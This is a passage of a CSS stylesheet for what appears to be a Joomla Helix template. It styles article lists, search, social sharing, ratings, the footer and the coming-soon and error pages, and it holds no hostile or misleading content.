  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover >i,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover >i {
  opacity: 1;
  margin-left: 5px;
}
.sp-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li span {
  margin: 0 7px 0 0;
  padding: 0;
  display: inline-table;
  font-size: 85%;
  color: #888;
  line-height: 1;
}
.sp-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li span >i {
  margin: 0 3px 0 0;
  font-size: 90%;
  line-height: 1.33;
  vertical-align: top;
}
.sp-module ul.category-module >li p,
.sppb-addon-module ul.category-module >li p {
  margin: 5px auto 0;
  font-size: 90%;
  color: #888;
  line-height: 1.5;
}
.sp-module ul.category-module >li p .fa-quote-left,
.sppb-addon-module ul.category-module >li p .fa-quote-left {
  margin: 0 5px 0 0;
  font-size: 90%;
}
.sp-module ul.category-module >li p .fa-quote-right,
.sppb-addon-module ul.category-module >li p .fa-quote-right {
  margin: 0 0 0 5px;
  font-size: 90%;
}
.sp-module .latest-articles,
.sppb-addon-module .latest-articles {
  display: block;
  width: 100%;
}
.sp-module .latest-articles a,
.sppb-addon-module .latest-articles a {
  float: left;
  color: #707070;
  width: 100%;
  clear: both;
  font-size: 14px;
  line-height: 1.57;
  padding: 5px 0;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
}
.sp-module .latest-articles a .article-list-img,
.sppb-addon-module .latest-articles a .article-list-img {
  float: left;
  margin: 0 15px 0 0;
  width: 50px;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.sp-module .latest-articles a .article-list-img .overlay,
.sppb-addon-module .latest-articles a .article-list-img .overlay {
  position: absolute;
  -webkit-transition: all .3s ease;
  -moz-transition: all .3s ease;
  -o-transition: all .3s ease;
  transition: all .3s ease;
  width: 50px;
  height: 50px;
  box-shadow: none;
  border-radius: 2px;
}
.sp-module .latest-articles a .article-list-img img,
.sppb-addon-module .latest-articles a .article-list-img img {
  width: 50px;
  height: 50px;
  object-fit: cover;
  border-radius: 2px;
}
.sp-module .latest-articles a .latest-articles-title,
.sppb-addon-module .latest-articles a .latest-articles-title {
  width: 70%;
  margin: 10px 0;
  font-size: 14px;
  line-height: 1.57;
}
.sp-module .latest-articles a .date,
.sppb-addon-module .latest-articles a .date {
  float: left;
  display: block;
  margin: 0 15px 0 0;
  width: 50px;
  text-align: center;
  background: rgba(155,155,155,0.1);
  border-radius: 2px;
  color: #777;
  border: 1px solid rgba(95,95,95,0.12);
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.sp-module .latest-articles a .date .year,
.sppb-addon-module .latest-articles a .date .year {
  font-size: 15px;
  line-height: 27px;
  color: #999;
}
.sp-module .latest-articles a .date small,
.sppb-addon-module .latest-articles a .date small {
  font-size: 11px;
  line-height: 15px;
  display: block;
  clear: both;
  margin: 5px auto 0;
  color: #777;
}
.sp-module .latest-articles a:hover,
.sp-module .latest-articles a:focus,
.sppb-addon-module .latest-articles a:hover,
.sppb-addon-module .latest-articles a:focus {
  color: #444;
}
.sp-module .latest-articles a:hover .overlay,
.sp-module .latest-articles a:focus .overlay,
.sppb-addon-module .latest-articles a:hover .overlay,
.sppb-addon-module .latest-articles a:focus .overlay {
  box-shadow: inset 0 0 0 2px rgba(55,55,55,0.25);
}
.sp-module .latest-articles a:hover .date,
.sp-module .latest-articles a:focus .date,
.sppb-addon-module .latest-articles a:hover .date,
.sppb-addon-module .latest-articles a:focus .date {
  border: 1px solid rgba(95,95,95,0.35);
}
.sp-module .latest-articles a:hover .date .year,
.sp-module .latest-articles a:focus .date .year,
.sppb-addon-module .latest-articles a:hover .date .year,
.sppb-addon-module .latest-articles a:focus .date .year {
  color: #888;
}
.sp-module .latest-articles a:hover .date small,
.sp-module .latest-articles a:focus .date small,
.sppb-addon-module .latest-articles a:hover .date small,
.sppb-addon-module .latest-articles a:focus .date small {
  color: #666;
}
.sp-module .tagscloud,
.sppb-addon-module .tagscloud {
  margin: -2px 0;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  display: inline-block;
  padding: 4px 10px;
  font-size: 85%;
  color: #fff;
  border: 1px solid #ccc;
  border-radius: 4px;
  margin: 3px 0 3px 2px;
}
.sp-module .tagscloud .tag-name span,
.sppb-addon-module .tagscloud .tag-name span {
  display: inline-block;
  min-width: 8px;
  margin: 0 -1px 0 3px;
  padding: 3px 7px;
  font-size: 11px;
  font-weight: 700;
  line-height: 1.3;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  background-color: rgba(0,0,0,0.12);
  border-radius: 10px;
}
#sp-left .relateditems .relateditem,
#sp-right .relateditems .relateditem {
  width: 100%;
  padding-bottom: 4px;
  margin-bottom: 4px;
  border-bottom: 1px solid #f2f2f2;
}
#sp-left .relateditems .relateditem:last-child,
#sp-right .relateditems .relateditem:last-child {
  padding-bottom: 0;
  margin-bottom: 0;
  border-bottom: 0;
}
#sp-left .relateditems .relateditem >a,
#sp-right .relateditems .relateditem >a {
  display: block;
  font-weight: 400;
  line-height: 1.5;
  padding: 2px;
  margin: 7px auto;
  background: transparent;
}
#sp-left .relateditems .relateditem >a .article-list-img,
#sp-right .relateditems .relateditem >a .article-list-img {
  float: left;
  margin: 0 10px 0 0;
  width: 60px;
}
#sp-left .relateditems .relateditem >a .article-list-img img,
#sp-right .relateditems .relateditem >a .article-list-img img {
  width: 60px;
  height: 60px;
  object-fit: cover;
  border-radius: 2px;
}
#sp-left .relateditems .relateditem >a .related-articles-title,
#sp-right .relateditems .relateditem >a .related-articles-title {
  font-size: 95%;
}
#sp-left .relateditems .relateditem >a >i.fa,
#sp-left .relateditems .relateditem >a >i.fas,
#sp-left .relateditems .relateditem >a >i.far,
#sp-right .relateditems .relateditem >a >i.fa,
#sp-right .relateditems .relateditem >a >i.fas,
#sp-right .relateditems .relateditem >a >i.far {
  font-size: 90%;
  line-height: 12px;
  color: #888;
  width: 16px;
  margin-right: 0;
  text-align: center;
}
#sp-left .relateditems .relateditem >a .related_date,
#sp-right .relateditems .relateditem >a .related_date {
  display: block;
  margin: 1px 0 0 0;
  font-size: 85%;
  color: #888;
}
#sp-left .relateditems .relateditem >a .related_date >i,
#sp-right .relateditems .relateditem >a .related_date >i {
  color: #bbb;
  width: 16px;
  margin-right: 3px;
  text-align: center;
}
.relateditems {
  display: block;
}
.relateditems .relateditem {
  padding: 0 10px;
}
.relateditems .relateditem a {
  float: left;
  color: #707070;
  background: #f6f6f6;
  width: 100%;
  clear: both;
  font-size: 14px;
  line-height: 1.57;
  padding: 10px;
  margin: 10px auto;
  border-radius: 3px;
}
.relateditems .relateditem a .article-list-img {
  float: left;
  margin: 0 15px 0 0;
  width: 100px;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.relateditems .relateditem a .article-list-img .overlay {
  position: absolute;
  -webkit-transition: all .3s ease;
  -moz-transition: all .3s ease;
  -o-transition: all .3s ease;
  transition: all .3s ease;
  width: 100px;
  height: 80px;
  box-shadow: none;
  border-radius: 2px;
  background: transparent;
}
.relateditems .relateditem a .article-list-img img {
  width: 100px;
  height: 80px;
  object-fit: cover;
  border-radius: 2px;
}
.relateditems .relateditem a .related-articles-title {
  font-size: 100%;
  display: block;
  margin: 0 0 10px;
  font-size: 15px;
  line-height: 1.57;
  font-weight: bold;
}
.relateditems .relateditem a .related_date {
  margin: 10px 15px 0 0;
  color: #777;
  font-size: 90%;
}
.relateditems .relateditem a:hover,
.relateditems .relateditem a:focus {
  color: #444;
  background: #e9e9e9;
}
.relateditems .relateditem a:hover .article-list-img,
.relateditems .relateditem a:focus .article-list-img {
  filter: brightness(109%);
  background: rgba(0,0,0,0.1);
}
.top-search-wrapper {
  position: relative;
  line-height: 32px;
  width: 42px;
  z-index: 3;
  -webkit-transition: color 0.3s ease-in-out;
  -moz-transition: color 0.3s ease-in-out;
  -o-transition: color 0.3s ease-in-out;
  transition: color 0.3s ease-in-out;
}
.top-search-wrapper .icon-top-wrapper {
  cursor: pointer;
}
.top-search-wrapper .icon-top-wrapper i.fa,
.top-search-wrapper .icon-top-wrapper i.fas,
.top-search-wrapper .icon-top-wrapper i.far {
  font-size: 15px;
  text-align: center;
  width: 42px;
  margin: 0 auto;
}
.top-search-wrapper .icon-top-wrapper i.pe {
  font-size: 18px;
  text-align: center;
  font-weight: bold;
  width: 42px;
  margin: 0 auto;
}
.top-search-wrapper .icon-top-wrapper .search-close-icon {
  display: none;
}
.top-search-wrapper .icon-top-wrapper .search-close-icon.open {
  display: block;
}
.top-search-wrapper .icon-top-wrapper i.pe.search-close-icon.open {
  font-size: 22px;
}
.top-search-wrapper .icon-top-wrapper .search-close-icon,
.top-search-wrapper .icon-top-wrapper .search-open-icon {
  width: 42px;
  text-align: center;
  line-height: 32px;
}
.top-search-input-wrap {
  display: none;
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
}
.top-search-input-wrap .top-search-wrap {
  position: absolute;
  right: -10px;
  left: auto;
  float: left;
  width: 360px;
  margin: -20px 0 0 0;
  z-index: 8;
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -webkit-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
  -moz-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
  -ms-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
  -o-transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
  transform: translateY(-20px) scale(0.85) perspective(500px) rotateX(90deg);
  -webkit-transition: all 0.3s cubic-bezier(0.405,0.020,0.325,0.950);
  -moz-transition: all 0.3s cubic-bezier(0.405,0.020,0.325,0.950);
  -o-transition: all 0.3s cubic-bezier(0.405,0.020,0.325,0.950);
  transition: all 0.3s cubic-bezier(0.405,0.020,0.325,0.950);
  opacity: 0;
}
.top-search-input-wrap .top-search-wrap .searchwrapper {
  background-color: rgba(255,255,255,0.95);
  padding: 8px 0;
  border-radius: 3px;
  margin-top: -1px;
}
.top-search-input-wrap .top-search-wrap .sp_search_input {
  width: 360px;
}
.top-search-input-wrap .top-search-wrap .sp_search_input input {
  background-color: transparent;
  width: 100%;
  height: auto;
  font-size: 18px;
  font-weight: 600;
  border: 0;
  box-shadow: none;
  text-align: center;
}
.top-search-input-wrap .top-search-wrap.active {
  margin-top: 1vh;
  -webkit-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  -moz-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  -ms-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  -o-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  opacity: 1;
}
.finder .form-search .flex-search {
  position: relative;
}
.finder .form-search .flex-search .search-query {
  width: 100%;
}
.finder .form-search .flex-search:before {
  position: absolute;
}
.finder .form-search .finder-selects .advancedSelect {
  width: 100%;
}
.search-pages-counter {
  margin: 20px auto !important;
  padding: 10px 25px;
  display: table;
  border: 1px solid #ddd;
  border-radius: 4px;
}
.search input#mod-search-searchword {
  width: 100%;
  border-radius: 4px;
}
.search input#mod-search-searchword:focus {
  box-shadow: none;
}
.search button[name="Search"] {
  position: absolute;
  right: -19px;
  border-radius: 0 4px 4px 0;
  line-height: 1;
  width: 42px;
  height: 34px;
  padding-left: 5px;
  padding-right: 4px;
}
.search button[name="Search"] .fa-search {
  font-size: 110%;
  vertical-align: top;
  line-height: 1.1;
}
.search.flex-search:before {
  font-family: 'Font Awesome 5 Free';
  content: "\f002";
  font-weight: 900;
  position: relative;
  z-index: 1;
  margin-bottom: -42px;
  float: right;
  right: 12px;
  line-height: 2.2;
  padding-left: 3px;
  text-align: center;
  vertical-align: middle;
  opacity: 0.9;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.search.flex-search:hover:before,
.search.flex-search:focus:before,
.search.flex-search:active:before {
  opacity: 0.2;
  content: "\f00e";
  font-weight: 900;
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
}
.search .btn-toolbar {
  margin-bottom: 20px;
}
.search .btn-toolbar span.icon-search {
  margin: 0;
}
.search .btn-toolbar button {
  color: #fff;
}
.search .phrases .phrases-box .controls label {
  display: inline-block;
  margin: 0 20px 20px;
}
.search .phrases .ordering-box {
  margin-bottom: 15px;
}
.search .only label {
  display: inline-block;
  margin: 0 20px 20px;
}
.search .search-results dt.result-title {
  margin-top: 40px;
  font-size: 110%;
}
.search .search-results dt.result-title > a + i.fa-link {
  font-size: 90%;
  color: #909090;
  line-height: 1.1;
  margin-left: -5px;
  opacity: 0;
  -webkit-transition: all .2s ease-in-out;
  -moz-transition: all .2s ease-in-out;
  -o-transition: all .2s ease-in-out;
  transition: all .2s ease-in-out;
}
.search .search-results dt.result-title > a:hover + i.fa-link {
  opacity: 1;
  margin-left: 3px;
}
.search .search-results dt,
.search .search-results dd {
  margin: 5px 0;
}
.search .search-results .result-created {
  margin: 10px 0 0;
  font-size: 90%;
}
.search span.highlight {
  background: #9BCC56;
  color: #fff;
  padding: 0 3px;
}
.filter-search .chzn-container-single .chzn-single {
  height: 34px;
  line-height: 34px;
}
.form-search .finder label {
  display: block;
}
.form-search .finder .input-medium {
  width: 60%;
  border-radius: 4px;
}
.finder .word input {
  display: inline-block;
}
.finder .search-results.list-striped li {
  padding: 20px 0;
}
.chzn-container-single .chzn-single div b {
  background: none !important;
  color: #999;
}
.chzn-container-single .chzn-single div b:after {
  content: "\f0d7";
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  width: 18px;
  height: 29px;
  line-height: 29px;
  position: absolute;
  right: 0;
  top: 0;
}
.chzn-container-active.chzn-with-drop .chzn-single div b:after {
  content: "\f0d8";
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
}
.chzn-container-single .chzn-drop,
.chzn-container-single .chzn-search input[type="text"],
.chzn-container-single .chzn-drop {
  min-width: 100%;
}
.article-info {
  margin: 0;
  padding-top: 12px;
  line-height: 12px;
}
.article-info >dd {
  display: inline-block;
  font-size: 12px;
  line-height: 20px;
  color: #666;
  margin: 0 5px;
}
.article-info >dd >i,
.article-info >dd >span.fa-eye,
.article-info >dd >span.far.fa-eye {
  display: inline-block;
  margin-right: 2px;
}
.article-info >dd .voting-symbol {
  margin-left: 3px;
}
.tag-category .btn-group.pull-right {
  margin-right: 10px;
}
.tag-category table.category {
  margin: 30px auto;
}
.tag-category ul.category {
  padding: 40px 0;
}
.tag-category ul.category li .sp-module {
  margin: 0;
}
.tag-category ul.category li h3 >a {
  font-size: 115%;
  line-height: 1.3;
}
.tag-category ul.category li >.tag-body {
  margin: 5px 0 0 0;
}
.tag-category ul.category li >.tag-img {
  margin: 5px 25px 5px 0;
  width: 33%;
}
.tag-category ul.category li >.tag-img .overlay {
  position: relative;
}
.tag-category ul.category li >.tag-img .overlay:before {
  content: "";
  opacity: 0;
  width: 100%;
  height: 100%;
  position: absolute;
  background: rgba(0,0,0,0.1);
  box-shadow: inset 0 0 25px rgba(0,0,0,0.15), inset 0 0 0 5px rgba(0,0,0,0.1);
  -webkit-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.tag-category ul.category li >.tag-img .overlay i {
  position: absolute;
  opacity: 0;
  color: #fff;
  font-size: 20px;
  line-height: 1;
  padding: 10px 11px;
  margin: -10px 0 0 -20px;
  border-radius: 3px;
  text-align: center;
  vertical-align: middle;
  top: 50%;
  left: 50%;
  background: rgba(0,0,0,0.5);
  -webkit-transition: all .3s ease-in-out .1s;
  transition: all .3s ease-in-out .1s;
}
.tag-category ul.category li >.tag-img .overlay:hover:before {
  opacity: 1;
}
.tag-category ul.category li >.tag-img .overlay:hover i {
  opacity: 1;
  margin: -19px 0 0 -21px;
}
.tag-category ul.category li:last-child {
  border-bottom: none;
}
.tags {
  font-size: 90%;
  padding-top: 10px;
  float: left;
  margin: 7px 20px 0 0;
}
.tags >span >i {
  margin: 0 5px 0 3px;
}
.tags:hover >span >i {
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.tags >a {
  margin-right: 5px;
}
.readmore {
  margin: 0 20px 0 0;
  float: left;
}
.helix-social-share .helix-social-share-blog {
  margin-top: 11px;
  float: left;
  display: table;
}
.helix-social-share .helix-social-share-blog ul {
  padding: 6px;
  list-style: none;
  margin: 0;
  background: #eee;
  border-radius: 3px;
}
.helix-social-share .helix-social-share-blog ul li {
  display: inline-block;
  margin-right: 4px;
}
.helix-social-share .helix-social-share-blog ul li:last-child {
  margin-right: 0;
}
.helix-social-share .helix-social-share-blog ul li a {
  font-size: 14px;
  display: inline-block;
  text-align: center;
  text-transform: none;
  border-radius: 2px;
  color: #fff;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.helix-social-share .helix-social-share-blog ul li a > i {
  height: 24px;
  width: 26px;
  line-height: 24px;
}
.helix-social-share .helix-social-share-blog ul li a.facebook {
  background-color: #3b5998;
}
.helix-social-share .helix-social-share-blog ul li a.twitter {
  background-color: #1da1f2;
}
.helix-social-share .helix-social-share-blog ul li a.google-plus {
  background-color: #dd4b39;
}
.helix-social-share .helix-social-share-blog ul li a.linkedin {
  background-color: #00a0dc;
}
.helix-social-share .helix-social-share-blog ul li a:hover {
  background-color: #555;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article {
  margin-top: 9px;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article ul {
  padding: 2px;
  margin: 0;
  background: transparent;
  border-radius: 3px;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li {
  display: inline-block;
  margin-right: 4px;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li a {
  font-size: 14px;
  border-radius: 3px;
  color: #fff;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li a > i {
  height: 24px;
  width: 24px;
  line-height: 24px;
  font-size: 17px;
  text-align: center;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li a.facebook,
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li a.twitter {
  padding: 5px 20px 5px 18px;
}
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li a.google-plus,
.helix-social-share .helix-social-share-blog.helix-social-share-article ul li a.linkedin {
  padding: 5px 10px;
}
.content_rating,
.content_rating + form {
  display: none;
}
.voting-symbol {
  unicode-bidi: bidi-override;
  direction: rtl;
  font-size: 1em;
  display: inline-block;
}
.voting-symbol span.star {
  font-family: 'Font Awesome 5 Free';
  font-style: normal;
  display: inline-block;
}
.voting-symbol span.star.active:before {
  font-weight: 900;
}
.voting-symbol span.star:before {
  content: "\f005";
  font-style: normal;
  font-weight: 400;
  padding-right: 0.3em;
}
.sp-rating span.star:before,
.sp-rating span.star ~ span.star:before {
  -webkit-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.sp-rating span.star:hover:before,
.sp-rating span.star:hover ~ span.star:before {
  cursor: pointer;
  font-weight: 900;
}
.post_rating {
  margin-bottom: 20px;
}
.post_rating .ajax-loader,
.post_rating .voting-result {
  display: none;
}
.entry-image,
.entry-gallery,
.entry-video,
.entry-audio,
.entry-link,
.entry-status,
.entry-quote {
  margin-bottom: 30px;
  position: relative;
}
.entry-image .img-caption-overlay {
  background: rgba(0,0,0,0.6);
  background: linear-gradient(rgba(0,0,0,0.4),rgba(0,0,0,0.6));
  color: #fff;
  padding: 5px 15px;
  display: block;
  position: absolute;
  bottom: 0;
  left: 0;
  right: 0;
}
.has-post-format-masonry {
  position: absolute;
}
.has-post-format-masonry .post-format-masonry {
  position: absolute;
  z-index: 2;
  top: 7px;
  left: 8px;
  width: 24px;
  height: 24px;
}
.has-post-format-masonry .post-format-masonry > i {
  font-size: 14px;
  width: 24px;
  height: 24px;
  line-height: 24px;
  text-align: center;
  color: #fff;
  margin: 0 auto;
  border-radius: 2px;
}
.entry-header {
  position: relative;
  margin-bottom: 25px;
}
.entry-header.has-post-format {
  margin-left: 62px;
}
.entry-header.has-post-format .post-format {
  position: absolute;
  top: 3px;
  left: -62px;
  display: block;
  width: 48px;
  height: 48px;
  font-size: 24px;
  line-height: 48px;
  text-align: center;
  color: #fff;
  border-radius: 3px;
}
.entry-header h1 {
  font-size: 225%;
  font-weight: 300;
}
.entry-header h1,
.entry-header h2 {
  margin: 0;
  line-height: 1.2;
  width: auto;
  padding-right: 30px;
  box-shadow: inset 0 -1px 0 #ddd;
  display: table;
  word-wrap: break-word;
}
.entry-header h1:after,
.entry-header h2:after {
  clear: both;
  display: block;
  float: left;
  content: "";
  position: relative;
  height: 2px;
  width: 70%;
  margin: 10px 30% 0 0;
  border-radius: 2px;
  padding: 0;
}
.entry-link {
  padding: 50px;
  position: relative;
  z-index: 0;
  border-radius: 4px;
}
.entry-link a h4 {
  margin: 0;
  font-size: 36px;
  line-height: 1.5;
  color: #fff;
}
.entry-link a h4:hover {
  color: rgba(255,255,255,0.85);
}
.entry-link:before {
  position: absolute;
  right: -20px;
  font-size: 200px;
  font-family: 'Font Awesome 5 Free';
  content: "\f0c1";
  font-weight: 900;
  transform: rotate(180deg);
  top: 85px;
  color: rgba(255,255,255,0.1);
  z-index: -1;
}
.entry-quote {
  position: relative;
  padding: 50px;
  border-radius: 4px;
  color: rgba(255,255,255,0.9);
  z-index: 0;
}
.entry-quote:before {
  position: absolute;
  right: -10px;
  font-size: 200px;
  font-family: 'Font Awesome 5 Free';
  content: "\f10e";
  font-weight: 900;
  transform: rotate(320deg);
  top: 120px;
  color: rgba(255,255,255,0.1);
  z-index: -1;
}
.entry-quote blockquote small {
  color: #FFF;
  font-weight: 600;
  font-size: 20px;
}
.entry-quote blockquote {
  padding: 0;
  margin: 0;
  font-size: 16px;
  border: none;
}
.entry-quote blockquote .fa-quote-left {
  margin-right: 7px;
}
.entry-quote blockquote .fa-quote-right {
  margin-left: 7px;
}
.newsfeed-category .category {
  list-style: none;
  padding: 0;
  margin: 0;
}
.newsfeed-category .category li {
  padding: 5px 0;
}
.newsfeed-category #filter-search {
  margin: 10px 0;
}
.category-module,
.categories-module,
.archive-module,
.latestnews,
.newsflash-horiz,
.mostread,
.form-links,
.list-striped {
  list-style: none;
  padding: 0;
  margin: 0;
}
.category-module li,
.categories-module li,
.archive-module li,
.latestnews li,
.newsflash-horiz li,
.mostread li,
.form-links li,
.list-striped li {
  padding: 2px 0;
}
.category-module li h4,
.categories-module li h4,
.archive-module li h4,
.latestnews li h4,
.newsflash-horiz li h4,
.mostread li h4,
.form-links li h4,
.list-striped li h4 {
  margin: 5px 0;
}
#sp-bottom .sp-module .sp-module-title {
  text-transform: none;
  font-weight: 400;
  font-size: 24px;
}
footer {
  margin-top: auto;
}
#sp-footer {
  color: #fff;
  text-align: center;
  padding: 20px 0;
}
#sp-footer a {
  color: rgba(255,255,255,0.9);
}
#sp-footer a:hover {
  color: #fff;
}
#sp-footer-wrapper ul {
  display: inline-block;
}
#sp-footer-wrapper ul.nav {
  display: inline-block;
  list-style: none;
  padding: 0;
  margin: 0 5px;
}
#sp-footer-wrapper ul.nav li {
  display: inline-block;
  margin: 0 5px;
}
#sp-footer-wrapper ul.nav li a {
  display: block;
}
#sp-footer-wrapper ul.nav li a:hover {
  background: none;
}
#sp-footer-wrapper .helix-framework {
  display: inline-block;
}
#sp-footer-wrapper .copyright {
  display: block;
}
.sp-comingsoon {
  width: 100%;
  height: 100%;
  min-height: 100%;
}
.sp-comingsoon body {
  width: 100%;
  height: 100%;
  min-height: 100%;
  color: #fff;
}
.sp-comingsoon body #sp-comingsoon,
.sp-comingsoon body .sp-comingsoon-wrap {
  z-index: 1;
  position: relative;
}
.sp-comingsoon body a.logo {
  padding: 25px;
  width: 100%;
  text-align: center;
  display: table;
  margin: 0 auto 0;
  background: rgba(20,20,20,0.6);
  box-shadow: 0 30px 200px rgba(0,0,0,0.2);
}
.sp-comingsoon body a.logo img.sp-default-logo {
  text-align: center;
  margin: 0 0 0 -140px;
  padding: 5px;
  display: inline-table;
  -webkit-transition: all 300ms .4s;
  transition: all 300ms .4s;
}
.sp-comingsoon body a.logo div.backhome {
  margin: 0 auto;
  text-indent: -20px;
  padding: 0 5px;
  font-size: 17px;
  color: #ddd;
  line-height: 20px;
  display: inline-block;
  opacity: 0;
  -webkit-transition: all 500ms .5s;
  transition: all 500ms .5s;
}
.sp-comingsoon body a.logo + .fa-clock-o,
.sp-comingsoon body a.logo + .far.fa-clock {
  height: auto;
  position: fixed;
  overflow: hidden;
  top: 28%;
  left: 50%;
  margin: 0 0 0 -184px;
  text-align: center;
  font-size: 430px;
  color: rgba(0,0,0,0.12);
  opacity: 0.4;
  z-index: 0;
  -webkit-transition: transform .7s .7s, opacity .7s .8s;
  transition: transform .7s .7s, opacity .7s .8s;
  -ms-transform: rotate(30deg);
  -webkit-transform: rotate(30deg);
  transform: rotate(30deg);
}
.sp-comingsoon body a.logo:hover {
  background: rgba(0,0,0,0.6);
}
.sp-comingsoon body a.logo:hover img.sp-default-logo {
  text-align: center;
  margin: 0 0 0 10px;
}
.sp-comingsoon body a.logo:hover div.backhome {
  text-indent: -20px;
  opacity: 1;
}
.sp-comingsoon body a.logo:hover + .fa-clock-o,
.sp-comingsoon body a.logo:hover + .fa-clock {
  opacity: 0.6;
  -ms-transform: rotate(-400deg);
  -webkit-transform: rotate(-400deg);
  transform: rotate(-400deg);
}
.sp-comingsoon .sp-comingsoon-title {
  margin: 60px auto 0;
  font-size: 370%;
  font-weight: 300;
}
.sp-comingsoon .sp-comingsoon-content {
  margin: 20px auto 0;
  font-size: 26px;
  font-weight: 300;
}
.sp-comingsoon .days,
.sp-comingsoon .hours,
.sp-comingsoon .minutes,
.sp-comingsoon .seconds {
  display: inline-block;
  margin: 70px 15px;
}
.sp-comingsoon .days .number,
.sp-comingsoon .hours .number,
.sp-comingsoon .seconds .number,
.sp-comingsoon .minutes .number {
  width: 125px;
  height: 120px;
  line-height: 120px;
  border: 1px solid rgba(255,255,255,0.5);
  border-radius: 4px;
  display: inline-block;
  font-size: 48px;
  font-weight: 100;
  background-color: rgba(0,0,0,0.07);
}
.sp-comingsoon .days .string,
.sp-comingsoon .minutes .string,
.sp-comingsoon .seconds .string,
.sp-comingsoon .hours .string {
  display: block;
  font-size: 18px;
  margin-top: 10px;
}
.sp-comingsoon .social-icons li {
  display: inline-block;
  margin: 25px 15px 40px;
}
.sp-comingsoon .social-icons li a {
  color: rgba(255,255,255,0.7);
  font-size: 24px;
  -webkit-transition: color 400ms;
  transition: color 400ms;
}
.sp-comingsoon .social-icons li a:hover {
  color: #fff;
}
.sp-comingsoon .social-icons.with-bckg-img .social-icons {
  margin: 15px auto;
  padding: 3px 5px;
  border-radius: 5px;
}
.sp-comingsoon .social-icons.with-bckg-img .social-icons li {
  display: inline-table;
  margin: 5px 15px 2px;
}
.error-page {
  width: 100%;
  height: 100%;
  min-height: 100%;
}
.error-page body {
  width: 100%;
  height: 100%;
  min-height: 100%;
}
.error-page .error-page-inner {
  height: 100%;
  min-height: 100%;
  width: 100%;
  display: table;
  text-align: center;
}
.error-page .error-page-inner >div.container {
  display: table-cell;
  vertical-align: middle;
}
.error-page .error-page-inner >div.container .btn-error {
  background: #f35d4b;
  color: #fff;
  margin: 25px auto 40px;
}
.error-page .error-page-inner >div.container .btn-error >i {
  margin-right: 5px;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #f14833;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  font-size: 64px;
  line-height: 1;
  margin-bottom: 0;
  color: #f6887b;
}
.error-page .error-page-inner >div.container .error-code {
  font-weight: 100;
  font-size: 120px;
  line-height: 1;
  color: #f47363;
  margin: -10px 0 30px 0;
  padding: 0;
}
.error-page .error-page-inner >div.container .error-code-message {
  font-weight: 300;
  font-size: 40px;
  color: #777;
  line-height: 1;
  margin: 20px 0;
  padding: 0;
}
.error-page .error-page-inner >div.container .error-message {
  font-size: 24px;
  line-height: 1;
  color: #aaa;
  margin-bottom: 30px;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  font-size: 100px;
  font-weight: 100;
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  font-weight: 300;
  font-size: 130px;
  color: #f35d4b;
  margin: -15px 0 30px 0;
}
.error-page .error-page-inner.with-bckg-img div.container .error-code-message {
  font-weight: 300;
  font-size: 50px;
  color: #fff;
  margin: 20px 0;
  text-shadow: 2px 3px 6px rgba(0,0,0,0.25);
}
.error-page .error-page-inner.with-bckg-img div.container .error-message {
  font-size: 24px;
  line-height: 1;
  color: #fff;
  text-shadow: 1px 2px 4px rgba(0,0,0,0.25);
}
.sp-social-share ul {
  display: block;
  padding: 0;
  margin: 20px -5px 0;
